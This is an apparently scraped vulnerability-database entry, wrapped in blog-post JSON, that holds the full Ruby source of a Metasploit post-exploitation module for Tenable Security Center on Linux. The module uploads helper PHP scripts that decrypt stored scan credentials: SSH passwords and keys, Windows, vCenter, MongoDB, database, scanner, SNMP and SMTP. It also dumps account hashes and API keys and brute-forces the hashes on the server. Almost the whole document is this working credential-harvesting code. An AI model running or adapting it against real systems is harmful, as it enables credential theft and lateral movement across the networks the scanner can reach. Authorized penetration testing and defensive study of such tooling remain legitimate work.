{“lastseen”:”2026-05-15T19:28:16″,”description”:”This module collects credentials and setup information from Tenable Security Center. root or TNS user permissions are required. We don’t utilize SC’s builtin backup functionality as that requires SC to be shut down. The module works in 2 phases: Phase…”,”published”:”2026-05-15T19:02:31″,”modified”:”2026-05-15T19:02:31″,”type”:”metasploit”,”title”:”Tenable Security Center”,”source”:””,”references”:””,”id”:”MSF:POST-LINUX-GATHER-TENABLE_SECURITY_CENTER-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Post\\n\\n include Msf::Post::Linux::System\\n include Msf::Post::Linux::Priv\\n include Msf::Post::File\\n include Msf::Auxiliary::Report\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Tenable Security Center’,\\n ‘Description’ =\\u003e %q{\\n This module collects credentials and setup information\\n from Tenable Security Center. root or TNS user permissions\\n are required. We don’t utilize SC’s builtin backup\\n functionality as that requires SC to be shut down.\\n The module works in 2 phases:\\n\\n Phase 1: gather all passwords which can be decrypted. These\\n are non-user ones such as credentials used for scans, creds\\n for the Nessus servers, SMTP, etc.\\n\\n Phase 2: handle hashed passwords processing. SC uses SHA-512\\n and PBKDF2 according to the documentation, but the implementation\\n (salt+hash vs hash+salt) is unknown due to the source code being\\n protected by SourceGuardian. To get around this, we use a php\\n script on server to brute force the passwords. Note this will\\n use SC’s resources. The crack attempt rate is ~6\/sec on a test\\n instance, so you’ll want a small password list.\\n\\n Tested against SC 6.7.2 on RHEL9\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die’,\\n ],\\n ‘Platform’ =\\u003e [‘linux’],\\n ‘SessionTypes’ =\\u003e [‘shell’, ‘meterpreter’],\\n ‘References’ =\\u003e [\\n [ ‘URL’, ‘https:\/\/docs.tenable.com\/security-center\/Content\/EncryptionStrength.htm’]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [],\\n ‘Reliability’ =\\u003e []\\n }\\n )\\n )\\n register_options [\\n OptPath.new(‘WORDLIST’, [false, ‘The path to an optional wordlist’])\\n ]\\n register_advanced_options [\\n OptString.new(‘WritableDir’, [true, ‘A directory where we can write files’, ‘\/tmp’])\\n ]\\n end\\n\\n def run\\n unless is_root? || whoami == ‘tns’\\n fail_with(Failure::NoAccess, \\”Root permission or tns user required. Root permissions: #{is_root?}, username: #{whoami}\\”)\\n end\\n fail_with(Failure::NotFound, ‘Security Center not found (\/opt\/sc\/src\/defines.php)’) unless file?(‘\/opt\/sc\/src\/defines.php’)\\n\\n defines = read_file(‘\/opt\/sc\/src\/defines.php’)\\n version = defines.match(\/define\\\\(\\”SC_VERSION\\”,\\\\s*\\”([^\\”]+)\\”\\\\)\/)[1]\\n print_good(\\”Security Center Version: #{version}\\”)\\n\\n @sc_service_data = {\\n host: ::Rex::Socket.getaddress(session.sock.peerhost, true),\\n address: ::Rex::Socket.getaddress(session.sock.peerhost, true),\\n port: ‘443’,\\n service_name: ‘tenable security center’,\\n name: ‘tenable security center’,\\n protocol: ‘tcp’,\\n info: version.to_s,\\n workspace_id: myworkspace_id\\n }\\n report_service(@sc_service_data)\\n\\n if is_root?\\n @command_prefix = \\”su – tns -s \/bin\/bash -c ‘\/opt\/sc\/support\/bin\/php \\”\\n @command_postfix = \\”‘\\”\\n else\\n @command_prefix = ”\\n @command_postfix = ”\\n end\\n\\n gather_decrypted_creds\\n gather_hashed_creds\\n end\\n\\n def gather_decrypted_creds\\n script_path = \\”#{datastore[‘WritableDir’]}\/#{Rex::Text.rand_text_alphanumeric(8..10)}\\”\\n vprint_status(\\”Uploading database cred decryptor to #{script_path}\\”)\\n fail_with(Failure::BadConfig, \\”Unable to write to #{script_path}\\”) unless upload_file(script_path, ::File.join(Msf::Config.data_directory, ‘post’, ‘tenable’, ‘security_center’, ‘pull_encrypted_database_fields.php’))\\n vprint_status(\\”Running cred dumper: #{@command_prefix}#{script_path} -json#{@command_postfix}\\”)\\n output = cmd_exec(\\”#{@command_prefix}#{script_path} -json#{@command_postfix}\\”)\\n rm_f(script_path)\\n\\n begin\\n output = JSON.parse(output)\\n rescue JSON::ParserError =\\u003e e\\n print_error(\\”Error parsing JSON output: #{e}\\”)\\n end\\n\\n loot_path = store_loot(‘tenable.security_center.creds’, ‘application\/json’, session, output, ‘creds.json’, ‘Security Center Decrypted Credentials JSON’)\\n print_good(\\”Decrypted Security Center credentials stored to: #{loot_path}\\”)\\n\\n tbl = Rex::Text::Table.new(\\n ‘Header’ =\\u003e ‘Decrypted Credentials’,\\n ‘Indent’ =\\u003e 1,\\n ‘Columns’ =\\u003e [‘Source’, ‘Table’, ‘Username’, ‘Decrypted Password’, ‘Other Fields’]\\n )\\n\\n decrypted_flag = ‘ [DECRYPTED]’\\n ::Rex::Socket.getaddress(session.sock.peerhost, true)\\n\\n output.each { |cred| process_decrypted_cred(cred, tbl, decrypted_flag) }\\n print_good(tbl.to_s)\\n end\\n\\n def process_decrypted_cred(cred, tbl, decrypted_flag)\\n case cred[‘_table’]\\n when ‘AppSSHCredential’\\n service_data = {\\n address: ‘0.0.0.0’,\\n port: ’22’,\\n service_name: ‘ssh’,\\n protocol: ‘tcp’,\\n workspace_id: myworkspace_id\\n }\\n\\n if cred[‘authType’] == ‘password’\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred[‘username’],\\n private_data: cred[‘password’].gsub(decrypted_flag, ”),\\n private_type: :password\\n }\\n else\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred[‘username’],\\n private_data: cred[‘privateKey’].gsub(\\”\\\\r\\\\n\\”, \\”\\\\n\\”),\\n private_type: :ssh_key\\n }\\n end\\n\\n credential_data.merge!(service_data)\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::UNTRIED\\n }\\n\\n login_data.merge!(service_data)\\n create_credential_login(login_data)\\n info = cred.fetch(‘passphrase’, ”).gsub(decrypted_flag, ”)\\n info = \\”SSH Key Passphrase: #{info.gsub(decrypted_flag, ”)}\\” if info != ”\\n\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], cred[‘username’], credential_data[:private_data].gsub(\\”\\\\n\\”, ”), info]\\n\\n # check if they have privilege creds\\n if cred.key?(‘escalationPassword’) \\u0026\\u0026 cred[‘escalationPassword’].gsub(decrypted_flag, ”) != ”\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred.fetch(‘escalationUsername’, cred.fetch(‘escalationSuUser’, cred.fetch(‘escalationAccount’, ”))).gsub(decrypted_flag, ”),\\n private_data: cred[‘escalationPassword’].gsub(decrypted_flag, ”),\\n private_type: :password\\n }\\n\\n credential_data.merge!(service_data)\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::UNTRIED\\n }\\n\\n login_data.merge!(service_data)\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], credential_data[:username], credential_data[:private_data], \\”Escalation method: #{cred[‘privilegeEscalation’]}\\”]\\n end\\n when ‘AppWindowsCredential’\\n service_data = {\\n address: ‘0.0.0.0’,\\n port: ‘445’,\\n service_name: ‘smb’,\\n protocol: ‘tcp’,\\n workspace_id: myworkspace_id\\n }\\n\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred[‘username’],\\n private_data: cred[‘password’].gsub(decrypted_flag, ”),\\n private_type: :password\\n }\\n unless cred[‘domain’] == ”\\n credential_data[:realm_key] = Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN\\n credential_data[:realm_value] = cred[‘domain’]\\n end\\n\\n credential_data.merge!(service_data)\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::UNTRIED\\n }\\n\\n login_data.merge!(service_data)\\n create_credential_login(login_data)\\n\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], cred[‘username’], cred[‘password’].gsub(decrypted_flag, ”), ”]\\n when ‘AppVMwarevCenterCredential’\\n service_data = {\\n address: cred[‘vcenter_host’],\\n port: cred[‘vcenter_port’],\\n service_name: ‘vcenter’,\\n protocol: ‘tcp’,\\n workspace_id: myworkspace_id\\n }\\n\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred[‘vcenter_username’],\\n private_data: cred[‘vcenter_password’].gsub(decrypted_flag, ”),\\n private_type: :password\\n }\\n\\n credential_data.merge!(service_data)\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::UNTRIED\\n }\\n\\n login_data.merge!(service_data)\\n create_credential_login(login_data)\\n\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], cred[‘vcenter_username’], cred[‘vcenter_password’].gsub(decrypted_flag, ”), ”]\\n when ‘AppMongoDBCredential’\\n service_data = {\\n address: ‘0.0.0.0’,\\n port: cred[‘mongodb_port’],\\n service_name: ‘mongodb’,\\n protocol: ‘tcp’,\\n workspace_id: myworkspace_id\\n }\\n\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred[‘mongodb_username’],\\n private_data: cred[‘mongodb_password’].gsub(decrypted_flag, ”),\\n private_type: :password\\n }\\n\\n credential_data.merge!(service_data)\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::UNTRIED\\n }\\n\\n login_data.merge!(service_data)\\n create_credential_login(login_data)\\n\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], cred[‘mongodb_username’], cred[‘mongodb_password’].gsub(decrypted_flag, ”), cred[‘mongodb_database’]]\\n when ‘AppDatabaseCredential’\\n service_data = {\\n address: ‘0.0.0.0’,\\n port: cred[‘port’],\\n service_name: cred[‘dbType’],\\n protocol: ‘tcp’,\\n workspace_id: myworkspace_id\\n }\\n\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred[‘username’],\\n private_data: cred[‘password’].gsub(decrypted_flag, ”),\\n private_type: :password\\n }\\n\\n credential_data.merge!(service_data)\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::UNTRIED\\n }\\n\\n login_data.merge!(service_data)\\n create_credential_login(login_data)\\n\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], cred[‘username’], cred[‘password’].gsub(decrypted_flag, ”), cred[‘dbType’]]\\n when ‘Scanner’\\n service_data = {\\n address: cred[‘ip’],\\n port: cred[‘port’],\\n service_name: cred[‘nessusType’],\\n protocol: ‘tcp’,\\n workspace_id: myworkspace_id\\n }\\n\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred[‘username’],\\n private_data: cred[‘password’].gsub(decrypted_flag, ”),\\n private_type: :password\\n }\\n\\n credential_data.merge!(service_data)\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::UNTRIED\\n }\\n\\n login_data.merge!(service_data)\\n create_credential_login(login_data)\\n\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], cred[‘username’], cred[‘password’].gsub(decrypted_flag, ”), \\”Scanner Type: #{cred[‘nessusType’]}\\”]\\n when ‘SNMPCredential’\\n service_data = {\\n address: ‘0.0.0.0’,\\n port: ‘161’,\\n service_name: ‘snmp’,\\n protocol: ‘udp’,\\n workspace_id: myworkspace_id\\n }\\n\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: ”,\\n private_data: cred[‘communityString’].gsub(decrypted_flag, ”),\\n private_type: :password\\n }\\n\\n credential_data.merge!(service_data)\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::UNTRIED\\n }\\n\\n login_data.merge!(service_data)\\n create_credential_login(login_data)\\n\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], ”, cred[‘communityString’].gsub(decrypted_flag, ”), ”]\\n when ‘Configuration’ # SMTP\\n addr = if ::Rex::Socket.is_ip_addr?(cred[‘SMTPHost’])\\n cred[‘SMTPHost’]\\n else\\n begin\\n ::Rex::Socket.getaddress(cred[‘SMTPHost’], true)\\n rescue StandardError\\n ‘0.0.0.0’\\n end\\n end\\n\\n service_data = {\\n address: addr,\\n port: cred[‘SMTPPort’],\\n service_name: ‘smtp’,\\n protocol: ‘tcp’,\\n workspace_id: myworkspace_id\\n }\\n\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred[‘SMTPUsername’],\\n private_data: cred[‘SMTPPassword’].gsub(decrypted_flag, ”),\\n private_type: :password\\n }\\n\\n credential_data.merge!(service_data)\\n credential_core = create_credential(credential_data)\\n\\n login_data = {\\n core: credential_core,\\n status: Metasploit::Model::Login::Status::UNTRIED\\n }\\n\\n login_data.merge!(service_data)\\n create_credential_login(login_data)\\n\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], cred[‘SMTPUsername’], cred[‘SMTPPassword’].gsub(decrypted_flag, ”), ”]\\n else\\n username = cred.fetch(‘username’, ”)\\n password = cred.fetch(‘password’, ”).gsub(decrypted_flag, ”)\\n tbl \\u003c\\u003c [cred[‘_source’], cred[‘_table’], username, password, ”]\\n print_warning(‘Please reivew loot for additional details’)\\n end\\n end\\n\\n def gather_hashed_creds\\n script_path = \\”#{datastore[‘WritableDir’]}\/#{Rex::Text.rand_text_alphanumeric(8..10)}\\”\\n vprint_status(\\”Uploading database cred dumper to #{script_path}\\”)\\n fail_with(Failure::BadConfig, \\”Unable to write to #{script_path}\\”) unless upload_file(script_path, ::File.join(Msf::Config.data_directory, ‘post’, ‘tenable’, ‘security_center’, ‘dump_crack_hashes.php’))\\n vprint_status(\\”Running cred dumper: #{@command_prefix}#{script_path} -json#{@command_postfix}\\”)\\n output = JSON.parse(cmd_exec(\\”#{@command_prefix}#{script_path} -json#{@command_postfix}\\”))\\n\\n loot_path = store_loot(‘tenable.security_center.creds.hashed’, ‘application\/json’, session, output, ‘hashed_creds.json’, ‘Security Center Credentials JSON’)\\n print_good(\\”Decrypted Security Center credentials stored to: #{loot_path}\\”)\\n\\n cred_tbl = Rex::Text::Table.new(\\n ‘Header’ =\\u003e ‘Accounts Hashes’,\\n ‘Indent’ =\\u003e 1,\\n ‘Columns’ =\\u003e [‘UserID’, ‘Org’, ‘Username’, ‘Salt:Hash’]\\n )\\n api_keys_tbl = Rex::Text::Table.new(\\n ‘Header’ =\\u003e ‘API Keys’,\\n ‘Indent’ =\\u003e 1,\\n ‘Columns’ =\\u003e [‘ID’, ‘User ID’, ‘Name’, ‘Access Key’, ‘Salt:Hash’]\\n )\\n\\n output.each do |cred|\\n case cred[‘_table’]\\n when ‘APIKey’\\n api_keys_tbl \\u003c\\u003c [cred[‘id’], cred[‘userAuthID’], cred[‘name’], cred[‘accessKey’], \\”#{cred[‘salt’]}:#{cred[‘key’]}\\”]\\n when ‘UserAuth’\\n cred_tbl \\u003c\\u003c [cred[‘id’], cred[‘orgID’], cred[‘username’], \\”#{cred[‘salt’]}:#{cred[‘password’]}\\”]\\n end\\n end\\n\\n print_good(api_keys_tbl.to_s) unless api_keys_tbl.rows.empty?\\n print_good(cred_tbl.to_s) unless cred_tbl.rows.empty?\\n\\n unless datastore[‘WORDLIST’]\\n rm_f(script_path)\\n return\\n end\\n\\n crack_hashes(output, script_path)\\n end\\n\\n def crack_hashes(hashed_output, script_path)\\n wordlist_lines = File.read(datastore[‘WORDLIST’]).lines.count\\n estimate_minutes = ((hashed_output.length * wordlist_lines) \/ 6.0 \/ 60).round(1)\\n print_warning(\\”Estimated brute force time: #{estimate_minutes} minutes (#{hashed_output.length} users x #{wordlist_lines} words @ 6\/sec)\\”)\\n print_warning(‘Waiting 5 seconds for user interuption if this is too long a time.’)\\n sleep(5)\\n\\n wordlist_path = \\”#{datastore[‘WritableDir’]}\/#{Rex::Text.rand_text_alphanumeric(8..10)}\\”\\n vprint_status(\\”Uploading wordlist to: #{wordlist_path}\\”)\\n fail_with(Failure::BadConfig, \\”Unable to write to #{wordlist_path}\\”) unless upload_file(wordlist_path, datastore[‘WORDLIST’])\\n\\n output = JSON.parse(cmd_exec(\\”#{@command_prefix}#{script_path} -json -crack #{wordlist_path}#{@command_postfix}\\”).lines[1..].join)\\n rm_f(script_path)\\n rm_f(wordlist_path)\\n\\n cracked_tbl = Rex::Text::Table.new(\\n ‘Header’ =\\u003e ‘Cracked Credentials’,\\n ‘Indent’ =\\u003e 1,\\n ‘Columns’ =\\u003e [‘ID’, ‘User’, ‘Password’, ‘Admin’]\\n )\\n output.each do |cred|\\n cracked_tbl \\u003c\\u003c [cred[‘id’], cred[‘username’], cred[‘password’], cred[‘isAdmin’]]\\n credential_data = {\\n origin_type: :service,\\n module_fullname: fullname,\\n username: cred[‘username’],\\n private_data: cred[‘password’],\\n private_type: :password\\n }\\n\\n credential_data.merge!(@sc_service_data)\\n create_credential(credential_data)\\n end\\n\\n print_good(cracked_tbl.to_s) unless cracked_tbl.rows.empty?\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/post\/linux\/gather\/tenable_security_center.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/post\/linux\/gather\/tenable_security_center\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-15T19:28:16″,”description”:”This module collects credentials and setup information from Tenable Security Center. root or TNS user permissions are required. We don’t utilize SC’s builtin backup functionality…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-54916","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n